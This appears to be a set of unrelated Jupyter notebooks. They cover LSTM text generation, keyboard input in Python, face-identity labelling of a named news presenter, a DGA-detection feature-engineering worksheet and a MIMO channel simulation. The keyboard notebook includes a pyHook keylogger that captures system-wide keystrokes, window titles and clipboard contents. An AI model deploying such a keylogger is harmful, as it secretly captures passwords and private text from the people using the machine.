- Using Keras instead of python to simplify the code
If you want to learn more, you can also check out the Keras Team's text generation implementation on GitHub: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py.
Congratulations on finishing this notebook!
**References**:
- This exercise took inspiration from Andrej Karpathy's implementation: https://gist.github.com/karpathy/d4dee566867f8291f086. To learn more about text generation, also check out Karpathy's [blog post](http://karpathy.github.io/2015/05/21/rnn-effectiveness/).
- For the Shakespearian poem generator, our implementation was based on the implementation of an LSTM text generator by the Keras team: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py
| github_jupyter |
# pyHook
```
#-*- coding:utf8 -*-
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# 获取前台窗口句柄
hwnd = user32.GetForeground
Window()
# 获得进程ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# 保存当前进程ID
process_id = "%d" % pid.value
# 申请内存
executable = create_string_buffer("\x00" * 512)
# 打开进程
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
# 获取进程所对应的可执行文件的名字
psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
# 读取窗口标题
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
# 输出进程相关信息
print()
print("[ PID: %s - %s - %s]" % (process_id, executable.value,
window_title.value))
print()
# 关闭句柄
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
def keyStore(event):
global current_window
# 检查目标是否切换了窗口
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
# 检测按键是否为常规按键(非组合键等)
if event.Ascii > 32 and event.Ascii < 127:
print(chr(event.Ascii), end=' ')
else:
# 若输入为[CTRL-V],则获取剪切板内容
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print("[PASTE] - %s" % (pasted_value), end=' ')
else:
print("[%s]" % event.Key, end=' ')
# 返回直到下一个钩子事件被触发
return True
# 创建和注册钩子函数管理器
k1 = pyHook.HookManager()
#
k1.KeyDown = keyStore
# 注册键盘记录的钩子,然后永久执行
k1.HookKeyboard()
pythoncom.PumpMessages()
```
# keyboard
```
import keyboard # Using module keyboard
while True: # making a loop
try: # used try so that if user pressed other than the given key error will not be shown
if keyboard.is_pressed('q'): # if key 'q' is pressed
print('You Pressed A Key!')
break # finishing the loop
else:
pass
except:
break # if user pressed other than the given key the loop will break
```
# msvcrt
```
import msvcrt
while True:
if msvcrt.kbhit():
key = msvcrt.getch()
print(key) # just to show the result
```
# pygame
```
import pygame, sys
import pygame.locals
pygame.init()
BLACK = (0,0,0)
WIDTH = 1280
HEIGHT = 1024
windowSurface = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)
windowSurface.fill(BLACK)
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.K_q:
print('输入了Q,退出')
pygame.quit()
sys.exit()
print(event.type)
```
# tkinter
```
try: # In order to be able to import tkinter for
import tkinter as tk # either in python 2 or in python 3
except ImportError:
import Tkinter as tk
def onKeyPress(event):
text.insert('end', 'You pressed %s\n' % (event.char, ))
root = tk.Tk()
root.geometry('300x200')
text = tk.Text(root, background='black', foreground='white', font=('Comic Sans MS', 12))
text.pack()
root.bind('<KeyPress>', onKeyPress)
root.mainloop()
```
| github_jupyter |
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#Name" data-toc-modified-id="Name-1"><span class="toc-item-num">1 </span>Name</a></span></li><li><span><a href="#Search" data-toc-modified-id="Search-2"><span class="toc-item-num">2 </span>Search</a></span><ul class="toc-item"><li><span><a href="#Load-Cached-Results" data-toc-modified-id="Load-Cached-Results-2.1"><span class="toc-item-num">2.1 </span>Load Cached Results</a></span></li><li><span><a href="#Build-Model-From-Google-Images" data-toc-modified-id="Build-Model-From-Google-Images-2.2"><span class="toc-item-num">2.2 </span>Build Model From Google Images</a></span></li></ul></li><li><span><a href="#Analysis" data-toc-modified-id="Analysis-3"><span class="toc-item-num">3 </span>Analysis</a></span><ul class="toc-item"><li><span><a href="#Gender-cross-validation" data-toc-modified-id="Gender-cross-validation-3.1"><span class="toc-item-num">3.1 </span>Gender cross validation</a></span></li><li><span><a href="#Face-Sizes" data-toc-modified-id="Face-Sizes-3.2"><span class="toc-item-num">3.2 </span>Face Sizes</a></span></li><li><span><a href="#Screen-Time-Across-All-Shows" data-toc-modified-id="Screen-Time-Across-All-Shows-3.3"><span class="toc-item-num">3.3 </span>Screen Time Across All Shows</a></span></li><li><span><a href="#Appearances-on-a-Single-Show" data-toc-modified-id="Appearances-on-a-Single-Show-3.4"><span class="toc-item-num">3.4 </span>Appearances on a Single Show</a></span></li><li><span><a href="#Other-People-Who-Are-On-Screen" data-toc-modified-id="Other-People-Who-Are-On-Screen-3.5"><span class="toc-item-num">3.5 </span>Other People Who Are On Screen</a></span></li></ul></li><li><span><a href="#Persist-to-Cloud" data-toc-modified-id="Persist-to-Cloud-4"><span class="toc-item-num">4 </span>Persist to Cloud</a></span><ul class="toc-item"><li><span><a href="#Save-Model-to-Google-Cloud-Storage" data-toc-modified-id="Save-Model-to-Google-Cloud-Storage-4.1"><span class="toc-item-num">4.1 </span>Save Model to Google Cloud Storage</a></span></li><li><span><a href="#Save-Labels-to-DB" data-toc-modified-id="Save-Labels-to-DB-4.2"><span class="toc-item-num">4.2 </span>Save Labels to DB</a></span><ul class="toc-item"><li><span><a href="#Commit-the-person-and-labeler" data-toc-modified-id="Commit-the-person-and-labeler-4.2.1"><span class="toc-item-num">4.2.1 </span>Commit the person and labeler</a></span></li><li><span><a href="#Commit-the-FaceIdentity-labels" data-toc-modified-id="Commit-the-FaceIdentity-labels-4.2.2"><span class="toc-item-num">4.2.2 </span>Commit the FaceIdentity labels</a></span></li></ul></li></ul></li></ul></div>
```
from esper.prelude import *
from esper.identity import *
from esper import embed_google_images
```
# Name
Please add the person's name and their expected gender below (Male/Female).
```
name = 'Yasmin Vossoughian'
gender = 'Female'
```
# Search
## Load Cached Results
Reads cached identity model from local disk. Run this if the person has been labelled before and you only wish to regenerate the graphs. Otherwise, if you have never created a model for this person, please see the next section.
```
assert name != ''
results = FaceIdentityModel.load(name=name)
imshow(tile_imgs([cv2.resize(x[1][0], (200, 200)) for x in results.model_params['images']], cols=10))
plt.show()
plot_precision_and_cdf(results)
```
## Build Model From Google Images
Run this section if you do not have a cached model and precision curve estimates. This section will grab images using Google Image Search and score each of the faces in the dataset. We will interactively build the precision vs score curve.
It is important that the images that you select are accurate. If you make a mistake, rerun the cell below.
```
assert name != ''
# Grab face images from Google
img_dir = embed_google_images.fetch_images(name)
# If the images returned are not satisfactory, rerun the above with extra params:
# query_extras='' # additional keywords to add to search
# force=True # ignore cached images
face_imgs = load_and_select_faces_from_images(img_dir)
face_embs = embed_google_images.embed_images(face_imgs)
assert(len(face_embs) == len(face_imgs))
reference_imgs = tile_imgs([cv2.resize(x[0], (200, 200)) for x in face_imgs if x], cols=10)
def show_reference_imgs():
print('User selected reference images for {}.'.format(name))
imshow(reference_imgs)
plt.show()
show_reference_imgs()
# Score all of the faces in the dataset (this can take a minute)
face_ids_by_bucket, face_ids_to_score = face_search_by_embeddings(face_embs)
precision_model = PrecisionModel(face_ids_by_bucket)
```
Now we will validate which of the images in the dataset are of the target identity.
__Hover over with mouse and press S to select a face. Press F to expand the frame.__
```
show_reference_imgs()
print(('Mark all images that ARE NOT {}. Thumbnails are ordered by DESCENDING distance '
'to your selected images. (The first page is more likely to have non "{}" images.) '
'There are a total of {} frames. (CLICK THE DISABLE JUPYTER KEYBOARD BUTTON '
'BEFORE PROCEEDING.)').format(
name, name, precision_model.get_lower_count()))
lower_widget = precision_model.get_lower_widget()
lower_widget
show_reference_imgs()
print(('Mark all images that ARE {}. Thumbnails are ordered by ASCENDING distance '
'to your selected images. (The first page is more likely to have "{}" images.) '
'There are a total of {} frames. (CLICK THE DISABLE JUPYTER KEYBOARD BUTTON '
'BEFORE PROCEEDING.)').format(
name, name, precision_model.get_lower_count()))
upper_widget = precision_model.get_upper_widget()
upper_widget
```
Run the following cell after labelling to compute the precision curve. Do not forget to re-enable jupyter shortcuts.
```
# Compute the precision from the selections
lower_precision = precision_model.compute_precision_for_lower_buckets(lower_widget.selected)
upper_precision = precision_model.compute_precision_for_upper_buckets(upper_widget.selected)
precision_by_bucket = {**lower_precision, **upper_precision}
results = FaceIdentityModel(
name=name,
face_ids_by_bucket=face_ids_by_bucket,
face_ids_to_score=face_ids_to_score,
precision_by_bucket=precision_by_bucket,
model_params={
'images': list(zip(face_embs, face_imgs))
}
)
plot_precision_and_cdf(results)
```
The next cell persists the model locally.
```
results.save()
```
# Analysis
## Gender cross validation
Situations where the identity model disagrees with the gender classifier may be cause for alarm. We would like to check that instances of the person have the expected gender as a sanity check. This section shows the breakdown of the identity instances and their labels from the gender classifier.
```
gender_breakdown = compute_gender_breakdown(results)
print('Expected counts by gender:')
for k, v in gender_breakdown.items():
print(' {} : {}'.format(k, int(v)))
print()
print('Percentage by gender:')
denominator = sum(v for v in gender_breakdown.values())
for k, v in gender_breakdown.items():
print(' {} : {:0.1f}%'.format(k, 100 * v / denominator))
print()
```
Situations where the identity detector returns high confidence, but where the gender is not the expected gender indicate either an error on the part of the identity detector or the gender detector. The following visualization shows randomly sampled images, where the identity detector returns high confidence, grouped by the gender label.
```
high_probability_threshold = 0.8
show_gender_examples(results, high_probability_threshold)
```
## Face Sizes
Faces shown on-screen vary in size. For a person such as a host, they may be shown in a full body shot or as a face in a box. Faces in the background or those part of side graphics might be smaller than the rest. When calculuating screentime for a person, we would like to know whether the results represent the time the person was featured as opposed to merely in the background or as a tiny thumbnail in some graphic.
The next cell, plots the distribution of face sizes. Some possible anomalies include there only being very small faces or large faces.
```
plot_histogram_of_face_sizes(results)
```
The histogram above shows the distribution of face sizes, but not how those sizes occur in the dataset. For instance, one might ask why some faces are so large or whhether the small faces are actually errors. The following cell groups example faces, which are of the target identity with probability, by their sizes in terms of screen area.
```
high_probability_threshold = 0.8
show_faces_by_size(results, high_probability_threshold, n=10)
```
## Screen Time Across All Shows
One question that we might ask about a person is whether they received a significantly different amount of screentime on different shows. The following section visualizes the amount of screentime by show in total minutes and also in proportion of the show's total time. For a celebrity or political figure such as Donald Trump, we would expect significant screentime on many shows. For a show host such as Wolf Blitzer, we expect that the screentime be high for shows hosted by Wolf Blitzer.
```
screen_time_by_show = get_screen_time_by_show(results)
plot_screen_time_by_show(name, screen_time_by_show)
```
## Appearances on a Single Show
For people such as hosts, we would like to examine in greater detail the screen time allotted for a single show. First, fill in a show below.
```
show_name = 'First Look'
# Compute the screen time for each video of the show
screen_time_by_video_id = compute_screen_time_by_video(results, show_name)
```
One question we might ask about a host is "how long they are show on screen" for an episode. Likewise, we might also ask for how many episodes is the host not present due to being on vacation or on assignment elsewhere. The following cell plots a histogram of the distribution of the length of the person's appearances in videos of the chosen show.
```
plot_histogram_of_screen_times_by_video(name, show_name, screen_time_by_video_id)
```
For a host, we expect screentime over time to be consistent as long as the person remains a host. For figures such as Hilary Clinton, we expect the screentime to track events in the real world such as the lead-up to 2016 election and then to drop afterwards. The following cell plots a time series of the person's screentime over time. Each dot is a video of the chosen show. Red Xs are videos for which the face detector did not run.
```
plot_screentime_over_time(name, show_name, screen_time_by_video_id)
```
We hypothesized that a host is more likely to appear at the beginning of a video and then also appear throughout the video. The following plot visualizes the distibution of shot beginning times for videos of the show.
```
plot_distribution_of_appearance_times_by_video(results, show_name)
```
In the section 3.3, we see that some shows may have much larger variance in the screen time estimates than others. This may be because a host or frequent guest appears similar to the target identity. Alternatively, the images of the identity may be consistently low quality, leading to lower scores. The next cell plots a histogram of the probabilites for for faces in a show.
```
plot_distribution_of_identity_probabilities(results, show_name)
```
## Other People Who Are On Screen
For some people, we are interested in who they are often portrayed on screen with. For instance, the White House press secretary might routinely be shown with the same group of political pundits. A host of a show, might be expected to be on screen with their co-host most of the time. The next cell takes an identity model with high probability faces and displays clusters of faces that are on screen with the target person.
```
get_other_people_who_are_on_screen(results, k=25, precision_thresh=0.8)
```
# Persist to Cloud
The remaining code in this notebook uploads the built identity model to Google Cloud Storage and adds the FaceIdentity labels to the database.
## Save Model to Google Cloud Storage
```
gcs_model_path = results.save_to_gcs()
```
To ensure that the model stored to Google Cloud is valid, we load it and print the precision and cdf curve below.
```
gcs_results = FaceIdentityModel.load_from_gcs(name=name)
imshow(tile_imgs([cv2.resize(x[1][0], (200, 200)) for x in gcs_results.model_params['images']], cols=10))
plt.show()
plot_precision_and_cdf(gcs_results)
```
## Save Labels to DB
If you are satisfied with the model, we can commit the labels to the database.
```
from django.core.exceptions import ObjectDoesNotExist
def standardize_name(name):
return name.lower()
person_type = ThingType.objects.get(name='person')
try:
person = Thing.objects.get(name=standardize_name(name), type=person_type)
print('Found person:', person.name)
except ObjectDoesNotExist:
person = Thing(name=standardize_name(name), type=person_type)
print('Creating person:', person.name)
labeler = Labeler(name='face-identity:{}'.format(person.name), data_path=gcs_model_path)
```
### Commit the person and labeler
The labeler and person have been created but not set saved to the database. If a person was created, please make sure that the name is correct before saving.
```
person.save()
labeler.save()
```
### Commit the FaceIdentity labels
Now, we are ready to add the labels to the database. We will create a FaceIdentity for each face whose probability exceeds the minimum threshold.
```
commit_face_identities_to_db(results, person, labeler, min_threshold=0.001)
print('Committed {} labels to the db'.format(FaceIdentity.objects.filter(labeler=labeler).count()))
```
| github_jupyter |
<img src="../img/logo_white_bkg_small.png" align="left" />
# Feature Engineering
This worksheet covers concepts covered in the first part of the Feature Engineering module. It should take no more than 30-40 minutes to complete. Please raise your hand if you get stuck.
## Import the Libraries
For this exercise, we will be using:
* Pandas (http://pandas.pydata.org/pandas-docs/stable/)
* Numpy (https://docs.scipy.org/doc/numpy/reference/)
* Matplotlib (http://matplotlib.org/api/pyplot_api.html)
* Scikit-learn (http://scikit-learn.org/stable/documentation.html)
* YellowBrick (http://www.scikit-yb.org/en/latest/)
* Seaborn (https://seaborn.pydata.org)
```
# Load Libraries - Make sure to run this cell!
import pandas as pd
import numpy as np
import re
from collections import Counter
from sklearn import feature_extraction, tree, model_selection, metrics
from yellowbrick.features import Rank2D
from yellowbrick.features import RadViz
from yellowbrick.features import ParallelCoordinates
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib
import entropy
%matplotlib inline
```
## Feature Engineering
This worksheet is a step-by-step guide on how to detect domains that were generated using "Domain Generation Algorithm" (DGA). We will walk you through the process of transforming raw domain strings to Machine Learning features and creating a decision tree classifer which you will use to determine whether a given domain is legit or not. Once you have implemented the classifier, the worksheet will walk you through evaluating your model.
Overview 2 main steps:
1. **Feature Engineering** - from raw domain strings to numeric Machine Learning features using DataFrame manipulations
2. **Machine Learning Classification** - predict whether a domain is legit or not using a Decision Tree Classifier
**DGA - Background**
"Various families of malware use domain generation
algorithms (DGAs) to generate a large number of pseudo-random
domain names to connect to a command and control (C2) server.
In order to block DGA C2 traffic, security organizations must
first discover the algorithm by reverse engineering malware
samples, then generate a list of domains for a given seed. The
domains are then either preregistered, sink-holed or published
in a DNS blacklist. This process is not only tedious, but can
be readily circumvented by malware authors. An alternative
approach to stop malware from using DGAs is to intercept DNS
queries on a network and predict whether domains are DGA
generated. Much of the previous work in DGA detection is based
on finding groupings of like domains and using their statistical
properties to determine if they are DGA generated. However,
these techniques are run over large time windows and cannot be
used for real-time detection and prevention. In addition, many of
these techniques also use contextual information such as passive
DNS and aggregations of all NXDomains throughout a network.
Such requirements are not only costly to integrate, they may not
be possible due to real-world constraints of many systems (such
as endpoint detection). An alternative to these systems is a much
harder problem: detect DGA generation on a per domain basis
with no information except for the domain name. Previous work
to solve this harder problem exhibits poor performance and many
of these systems rely heavily on manual creation of features;
a time consuming process that can easily be circumvented by
malware authors..."
[Citation: Woodbridge et. al 2016: "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"]
A better alternative for real-world deployment would be to use "featureless deep learning" - We have a separate notebook where you can see how this can be implemented!( https://www.endgame.com/blog/technical-blog/using-deep-learning-detect-dgas, https://github.com/endgameinc/dga_predict)
**However, let's learn the basics first!!!**
## Worksheet for Part 1 - Feature Engineering
```
## Load data
df = pd.read_csv('../data/dga_data_small.csv')
df.drop(['host', 'subclass'], axis=1, inplace=True)
print(df.shape)
df.sample(n=5).head() # print a random sample of the DataFrame
df[df.isDGA == 'legit'].head()
# Google's 10000 most common english words will be needed to derive a feature called ngrams...
# therefore we already load them here.
top_en_words = pd.read_csv('../data/google-10000-english.txt', header=None, names=['words'])
top_en_words.sample(n=5).head()
# Source: https://github.com/first20hours/google-10000-english
d = top_en_words
```
## Part 1 - Feature Engineering
Option 1 to derive Machine Learning features is to manually hand-craft useful contextual information of the domain string. An alternative approach (not covered in this notebook) is "Featureless Deep Learning", where an embedding layer takes care of deriving features - a huge step towards more "AI".
Previous academic research has focused on the following features that are based on contextual information:
**List of features**:
1. Length ["length"]
2. Number of digits ["digits"]
3. Entropy ["entropy"] - use ```H_entropy``` function provided
4. Vowel to consonant ratio ["vowel-cons"] - use ```vowel_consonant_ratio``` function provided
5. The index of the first digit - use the ``firstDigitIndex`` function provided
5. N-grams ["n-grams"] - use ```ngram``` functions provided
**Tasks**:
Split into A and B parts, see below...
Please run the following function cell and then continue reading the next markdown cell with more details on how to derive those features. Have fun!
```
def H_entropy (x):
# Calculate Shannon Entropy
return entropy.shannon_entropy(x)
def firstDigitIndex( s ):
for i, c in enumerate(s):
if c.isdigit():
return i + 1
return 0
def vowel_consonant_ratio (x):
# Calculate vowel to consonant ratio
x = x.lower()
vowels_pattern = re.compile('([aeiou])')
consonants_pattern = re.compile('([b-df-hj-np-tv-z])')
vowels = re.findall(vowels_pattern, x)
consonants = re.findall(consonants_pattern, x)
try:
ratio = len(vowels) / len(consonants)
except: # catch zero devision exception
ratio = 0
return ratio
```
### Tasks - A - Feature Engineering
Please try to derive a new pandas 2D DataFrame with a new column for each of feature. Focus on ```length```, ```digits```, ```entropy``` and ```vowel-cons``` here. Also make sure to encode the ```isDGA``` column as integers. [pandas.Series.str](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.str.html), [pandas.Series.replace](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.replace.html) and [pandas.Series,apply](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.apply.html) can be very helpful to quickly derive those features. Functions you need to apply here are provided in above cell.
The ```ngram``` is a bit more complicated, see next instruction cell to add this feature...
```
# derive features
# encode strings of target variable as integers
# check intermediate 2D pandas DataFrame
```
### Tasks - B - Feature Engineering
Finally, let's tackle the **ngram** feature. There are multiple steps involved to derive this feature. Here in this notebook, we use an implementation outlined in the this academic paper [Schiavoni 2014: "Phoenix: DGA-based Botnet Tracking and Intelligence" - see section: Linguistic Features](http://s2lab.isg.rhul.ac.uk/papers/files/dimva2014.pdf).
- **What are ngrams???** Imagine a string like 'facebook', if I were to derive all n-grams for n=2 (aka bi-grams) I would get '['fa', 'ac', 'ce', 'eb', 'bo', 'oo', 'ok']', so you see that you slide with one step from the left and just group 2 characters together each time, a tri-gram for 'facebook' would yielfd '['fac', 'ace', 'ceb', 'ebo', 'boo', 'ook']'. Ngrams have a long history in natural language processing, but are also used a lot for example in detecting malicious executable (raw byte ngrams in this case).
Steps involved:
1. We have the 10000 most common english words (see data file we loaded, we call this DataFrame ```top_en_words``` in this notebook). Now we run the ```ngrams``` functions on a list of all these words. The output here is a list that contains ALL 1-grams, bi-grams and tri-grams of these 10000 most common english words.
2. We use the ```Counter``` function from collections to derive a dictionary ```d``` that contains the counts of all unique 1-grams, bi-grams and tri-grams.
3. Our ```ngram_feature``` function will do the core magic. It takes your domain as input, splits it into ngrams (n is a function parameter) and then looks up these ngrams in the english dictionary ```d``` we derived in step 2. Function returns the normalized sum of all ngrams that were contained in the english dictionary. For example, running ```ngram_feature('facebook', d, 2)``` will return 171.28 (this value is just like the one published in the Schiavoni paper).
4. Finally ```average_ngram_feature``` wraps around ```ngram_feature```. You will use this function as your task is to derive a feature that gives the average of the ngram_feature for n=1,2 and 3. Input to this function should be a simple list with entries calling ```ngram_feature``` with n=1,2 and 3, hence a list of 3 ngram_feature results.
5. **YOUR TURN: Apply ```average_ngram_feature``` to you domain column in the DataFrame thereby adding ```ngram``` to the df.**
6. **YOUR TURN: Finally drop the ```domain``` column from your DataFrame**.
Please run the following function cell and then write your code in the following cell.
```
# For simplicity let's just copy the needed function in here again
# Load dictionary of common english words from part 1
# Just run this cell...
from six.moves import cPickle as pickle
with open('../data/d_common_en_words' + '.pickle', 'rb') as f:
d = pickle.load(f)
def H_entropy (x):
# Calculate Shannon Entropy
prob = [ float(x.count(c)) / len(x) for c in dict.fromkeys(list(x)) ]
H = - sum([ p * np.log2(p) for p in prob ])
return H
def vowel_consonant_ratio (x):
# Calculate vowel to consonant ratio
x = x.lower()
vowels_pattern = re.compile('([aeiou])')
consonants_pattern = re.compile('([b-df-hj-np-tv-z])')
vowels = re.findall(vowels_pattern, x)
consonants = re.findall(consonants_pattern, x)
try:
ratio = len(vowels) / len(consonants)
except: # catch zero devision exception
ratio = 0
return ratio
# ngrams: Implementation according to Schiavoni 2014: "Phoenix: DGA-based Botnet Tracking and Intelligence"
# http://s2lab.isg.rhul.ac.uk/papers/files/dimva2014.pdf
def ngrams(word, n):
# Extract all ngrams and return a regular Python list
# Input word: can be a simple string or a list of strings
# Input n: Can be one integer or a list of integers
# if you want to extract multipe ngrams and have them all in one list
l_ngrams = []
if isinstance(word, list):
for w in word:
if isinstance(n, list):
for curr_n in n:
ngrams = [w[i:i+curr_n] for i in range(0,len(w)-curr_n+1)]
l_ngrams.extend(ngrams)
else:
ngrams = [w[i:i+n] for i in range(0,len(w)-n+1)]
l_ngrams.extend(ngrams)
else:
if isinstance(n, list):
for curr_n in n:
ngrams = [word[i:i+curr_n] for i in range(0,len(word)-curr_n+1)]
l_ngrams.extend(ngrams)
else:
ngrams = [word[i:i+n] for i in range(0,len(word)-n+1)]
l_ngrams.extend(ngrams)
# print(l_ngrams)
return l_ngrams
def ngram_feature(domain, d, n):
# Input is your domain string or list of domain strings
# a dictionary object d that contains the count for most common english words
# finally you n either as int list or simple int defining the ngram length
# Core magic: Looks up domain ngrams in english dictionary ngrams and sums up the
# respective english dictionary counts for the respective domain ngram
# sum is normalized
l_ngrams = ngrams(domain, n)
# print(l_ngrams)
count_sum=0
for ngram in l_ngrams:
if d[ngram]:
count_sum+=d[ngram]
try:
feature = count_sum/(len(domain)-n+1)
except:
feature = 0
return feature
def average_ngram_feature(l_ngram_feature):
# input is a list of calls to ngram_feature(domain, d, n)
# usually you would use various n values, like 1,2,3...
return sum(l_ngram_feature)/len(l_ngram_feature)
# Apply the average_ngram_features function to your data
# check final 2D pandas DataFrame containing all final features and the target vector isDGA
df.sample(10)
# Drop the domain column as we don't need it anymore
```
#### Breakpoint: Load Features and Labels
If you got stuck in Part 1, please simply load the feature matrix we prepared for you, so you can move on to Part 2 and train a Decision Tree Classifier.
```
df_final = pd.read_csv('../data/our_data_dga_features_final_df.csv')
print(df_final['isDGA'].value_counts())
df_final.sample(5)
```
### Visualizing the Results
At this point, we've created a dataset which has many features that can be used for classification. Using YellowBrick, your final step is to visualize the features to see which will be of value and which will not.
First, let's create a Rank2D visualizer to compute the correlations between all the features. Detailed documentation available here: http://www.scikit-yb.org/en/latest/examples/methods.html#feature-analysis
```
feature_names = ['length','digits','entropy','vowel-cons','firstDigitIndex','ngrams']
features = df_final[feature_names]
target = df_final.isDGA
# Your code here...
```
Now let's use a Seaborn pairplot as well. This will really show you which features have clear dividing lines between the classes. Docs are available here: http://seaborn.pydata.org/generated/seaborn.pairplot.html
```
# Your code here...
```
Finally, let's try making a RadViz of the features. This visualization will help us see whether there is too much noise to make accurate classifications.
```
# Your code here...
```
## Congrats!
Congrats! You've now extracted features from the dataset and are ready to begin creating some supervised models!
| github_jupyter |
```
# import necessary module
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import seaborn as sns
import scipy
from array_response import *
import itertools
from IPython.display import Image
from matplotlib.gridspec import GridSpec
```
### Parameters declaration
Declare parameters needed for channel realization
```
Ns = 1 # number of streams
Nc = 6 # number of cluster
Nray = 1 # number of rays in each cluster
Nt = 64 # number of transmit antennas
Nr = 16 # number of receive antennas
angle_sigma = 10/180*np.pi # standard deviation of the angles in azimuth and elevation both of Rx and Tx
gamma = np.sqrt((Nt*Nr)/(Nc*Nray))
realization = 1000 # equivalent to number of taking sample
count = 0
eps = 0.1 # 20dB isolation
sigma = np.sqrt(8/(1+eps**2)) # according to the normalization condition of H
```
### Channel Realization
Realize channel H for Dual-Polarized antenna array
```
H_pol = np.zeros((2*Nr,2*Nt,realization),dtype=complex)
At = np.zeros((Nt,Nc*Nray,realization),dtype=complex)
Ar = np.zeros((Nr,Nc*Nray,realization),dtype=complex)
alpha_hh = np.zeros((Nc*Nray,realization),dtype=complex)
alpha_hv = np.zeros((Nc*Nray,realization),dtype=complex)
alpha_vh = np.zeros((Nc*Nray,realization),dtype=complex)
alpha_vv = np.zeros((Nc*Nray,realization),dtype=complex)
AoD = np.zeros((2,Nc*Nray),dtype=complex)
AoA = np.zeros((2,Nc*Nray),dtype=complex)
H = np.zeros((2*Nr,2*Nt,realization),dtype=complex)
azi_rot = np.random.uniform(0,2*np.pi,realization)
ele_rot = np.random.uniform(0,np.pi/2,realization) # Why PI/2 ??
R = np.array([[np.cos(ele_rot)*np.cos(azi_rot),np.sin(ele_rot)],[-np.sin(ele_rot)*np.cos(azi_rot),np.cos(ele_rot)]]) # rotation matrix
for reali in range(realization):
for c in range(1,Nc+1):
AoD_azi_m = np.random.uniform(0,2*np.pi,1) # Mean Angle of Departure _ azimuth
AoD_ele_m = np.random.uniform(0,np.pi,1) # Mean Angle of Departure _ elevation
AoA_azi_m = np.random.uniform(0,2*np.pi,1) # Mean Angle of Arrival_ azimuth
AoA_ele_m = np.random.uniform(0,np.pi,1) # Mean Angle of Arrival_ elevation
AoD[0,(c-1)*Nray:Nray*c] = np.random.laplace(AoD_azi_m, angle_sigma, (1,Nray))
AoD[1,(c-1)*Nray:Nray*c] = np.random.laplace(AoD_ele_m, angle_sigma, (1,Nray))
AoA[0,(c-1)*Nray:Nray*c] = np.random.laplace(AoA_azi_m, angle_sigma, (1,Nray))
AoA[1,(c-1)*Nray:Nray*c] = np.random.laplace(AoA_ele_m, angle_sigma, (1,Nray))
for j in range(Nc*Nray):
At[:,j,reali] = array_response(AoD[0,j],AoD[1,j],Nt)/np.sqrt(2) # UPA array response
Ar[:,j,reali] = array_response(AoA[0,j],AoA[1,j],Nr)/np.sqrt(2)
var_hh = ((sigma**2)*(np.cos(AoD[0,j])**2)*(np.cos(AoA[0,j])**2)).real
var_hv = ((eps**2)*(sigma**2)*(np.cos(AoD[1,j])**2)*(np.cos(AoA[0,j])**2)).real
var_vh = ((eps**2)*(sigma**2)*(np.cos(AoD[0,j])**2)*(np.cos(AoA[1,j])**2)).real
var_vv = ((sigma**2)*(np.cos(AoD[1,j])**2)*(np.cos(AoA[1,j])**2)).real
alpha_hh[j,reali] = np.random.normal(0, np.sqrt(var_hh/2)) + 1j*np.random.normal(0, np.sqrt(var_hh/2))
alpha_hv[j,reali] = np.random.normal(0, np.sqrt(var_hv/2)) + 1j*np.random.normal(0, np.sqrt(var_hv/2))
alpha_vh[j,reali] = np.random.normal(0, np.sqrt(var_vh/2)) + 1j*np.random.normal(0, np.sqrt(var_vh/2))
alpha_vv[j,reali] = np.random.normal(0, np.sqrt(var_vv/2)) + 1j*np.random.normal(0, np.sqrt(var_vv/2))
alpha = np.vstack((np.hstack((alpha_hh[j,reali],alpha_hv[j,reali])),np.hstack((alpha_vh[j,reali],alpha_vv[j,reali]))))
H_pol[:,:,reali] = H_pol[:,:,reali] + np.kron(alpha,Ar[:,[j],reali]@At[:,[j],reali].conj().T)
H_pol[:,:,reali] = 2*gamma* H_pol[:,:,reali]
H[:,:,reali] = (np.kron(R[:,:,reali],np.eye(Nr)))@H_pol[:,:,reali]
H[:,:,reali] = np.sqrt(4/3)*H[:,:,reali]
```
### Check normalized condition
```
channel_fro_1 = np.zeros(realization)
for reali in range(realization):
channel_fro_1[reali] = np.linalg.norm(H_pol[:,:,reali],'fro')
print("4*Nt*Nr =", 4*Nt*Nr , " Frobenius norm H pol=", np.mean(channel_fro_1**2))
channel_fro_2 = np.zeros(realization)
for reali in range(realization):
channel_fro_2[reali] = np.linalg.norm(H[:,:,reali],'fro')
print("4*Nt*Nr =", 4*Nt*Nr , " Frobenius norm =", np.mean(channel_fro_2**2))
```
### Joint Horizontal/Vertical Beamformer Selection
| hori_tx | hori_rx | verti_tx | verti_rx |
|:--------|--------|--------:|:---------:|
```
Image("img/cluster.png")
```
### Histogram of chosen path
__path gain of each combination__
Numpath = number of total combination
path_combi = arrangement of combination
```
total_combi = Nc*Nray
cluster = np.arange(total_combi)
print(cluster)
c = list(itertools.combinations(cluster, 2))
num_path = (2*total_combi-1)*total_combi
path_combi = np.zeros((num_path,4),dtype=int)
print(path_combi.shape)
path_combi[0:total_combi,:]=np.arange(total_combi).reshape(total_combi,1).repeat(4,axis=1)
count = 0
for i in range(int(total_combi*(total_combi-1)/2)):
path_combi[total_combi+4*i,:] = np.array([c[count][0],c[count][0],c[count][1],c[count][1]])
path_combi[total_combi+4*i+1,:] = np.array([c[count][1],c[count][1],c[count][0],c[count][0]])
path_combi[total_combi+4*i+2,:] = np.array([c[count][0],c[count][1],c[count][1],c[count][0]])
